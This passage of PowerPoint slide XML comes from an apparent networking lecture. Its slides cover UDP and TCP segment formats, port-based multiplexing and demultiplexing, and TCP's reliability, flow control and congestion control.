          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4416425" y="4639250"/>
            <a:ext cx="1760538"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9" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F3CDECF-BD62-0840-815A-22926C3E9043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6176964" y="4639250"/>
            <a:ext cx="1760537"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0" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F481755B-D485-8B49-8329-1DFAED537602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4416425" y="5172650"/>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1" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EC08D2E-8FE8-104F-9EF5-B97D23FB95DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7939088" y="5172650"/>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2" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD802342-A7E3-8841-A6D5-E1C8626DB013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4700588" y="4223326"/>
            <a:ext cx="1295400" cy="3667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 SRC port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893963" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6BC4E4-091F-6A4E-A73E-B72AF4CBA45B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6405563" y="4223326"/>
            <a:ext cx="1295400" cy="3667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 DST port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893964" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0723151-C156-044F-8013-E1EFE1BB2DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4700588" y="4729738"/>
            <a:ext cx="1295400" cy="3667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checksum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893965" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8013915D-D911-BD46-9CA5-79386A85B629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6653213" y="4729738"/>
            <a:ext cx="895350" cy="3667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length</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893966" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C9ED819-F580-2545-B171-FC9D332D07E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5815013" y="540125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DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AC614D8-AA2A-DD43-B415-68A3419ADF29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274173" y="6471418"/>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516685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784B893D-01AF-4742-B18B-0FF136E04E94}"/>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12173ABA-743A-FE47-8850-05F41CA55EBB}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897026" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22330ACE-2D46-F940-BB83-995FC45ABD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8377673" y="2000250"/>
            <a:ext cx="3324225" cy="3200400"/>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27" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE13760-D385-F740-9594-56DA72B1318D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8301473" y="2095500"/>
            <a:ext cx="3324225" cy="3200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28" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15BAB323-FF89-4842-8AAE-84B5ECC45879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="167924"/>
            <a:ext cx="11173691" cy="958283"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Multiplexing and Demultiplexing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="5400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897029" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDB1D9B-1C40-6246-86AF-475795FB6FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384538" y="1827212"/>
            <a:ext cx="7603761" cy="5030788"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host receives IP datagrams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Each datagram has source and destination IP address, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Each datagram carries one transport-layer segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Each segment has source and destination port number </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host uses IP addresses and port numbers to direct the segment to appropriate socket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897030" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF68A976-930A-0945-A6AC-328EFEB5C0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8285597" y="2117726"/>
            <a:ext cx="1676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Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>source port #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897031" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061C0CC0-7545-EB45-AEDC-426C2E328806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10065185" y="2117726"/>
            <a:ext cx="14525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Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>dest port #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897032" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C244C60E-5DDA-4743-81BD-1CD9664ABE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8291947" y="2495550"/>
            <a:ext cx="33289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3" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{742496FE-DF3A-CA4D-B137-0B074ABDEB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8301473" y="3486150"/>
            <a:ext cx="3324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4" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24323581-EA14-794A-AD19-977E39490B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9939772" y="2095500"/>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5" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A87801-44FB-F14C-82AC-F80535D5E11D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9441298" y="1665288"/>
            <a:ext cx="9493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32 bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897036" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B27E84EB-D958-B549-9F9E-CD0D493BFE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10396972" y="1862138"/>
            <a:ext cx="1200150" cy="4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7" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFC79BD2-F132-BF49-A175-C514F957389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="8287185" y="1871663"/>
            <a:ext cx="11287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8" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8934D0C2-A610-FA40-A522-A4B2B5BED2B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9185710" y="3951288"/>
            <a:ext cx="132921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application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>(message)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897039" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633BA3B7-088C-8640-9079-D9F50F5D51B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8703110" y="2860675"/>
            <a:ext cx="229421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other header fields</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897040" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1D2294-EF71-DE49-B88F-749ED0AAB36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8436411" y="5518150"/>
            <a:ext cx="296747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TCP/UDP segment format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F43ECBB-F287-FB46-8969-7BFD0C963ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346437" y="6330434"/>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929006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50F3AF-1090-6140-A3E8-7914705BB267}"/>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C524B5F0-3740-7A4D-A36B-F84CE1A47B56}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="903170" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D851E23-4DD6-F94B-8C65-1050309B9C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630382" y="152401"/>
            <a:ext cx="11353800" cy="803564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transmission Control Protocol (TCP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="903171" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD8FDED-2D4F-AB42-8971-9747A01AB7D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1593273"/>
            <a:ext cx="10591800" cy="4544290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Connection oriented</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Explicit set-up and tear-down of TCP session</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Stream-of-bytes service</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Sends and receives a stream of bytes, not messages</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Reliable, in-order delivery</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Checksums to detect corrupted data</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Acknowledgments &amp; retransmissions for reliable delivery</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Sequence numbers to detect losses and reorder data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzPct val="750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Flow control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prevent overflow of the receiver’s buffer space</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Congestion control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adapt to network congestion for the greater good</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B806DB-D581-4440-9D0A-315D8E052424}"/>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2569448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3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3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31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3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3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3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317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317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3171">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317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3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60582C-A441-F248-83F4-1F740BDA0A57}"/>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Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
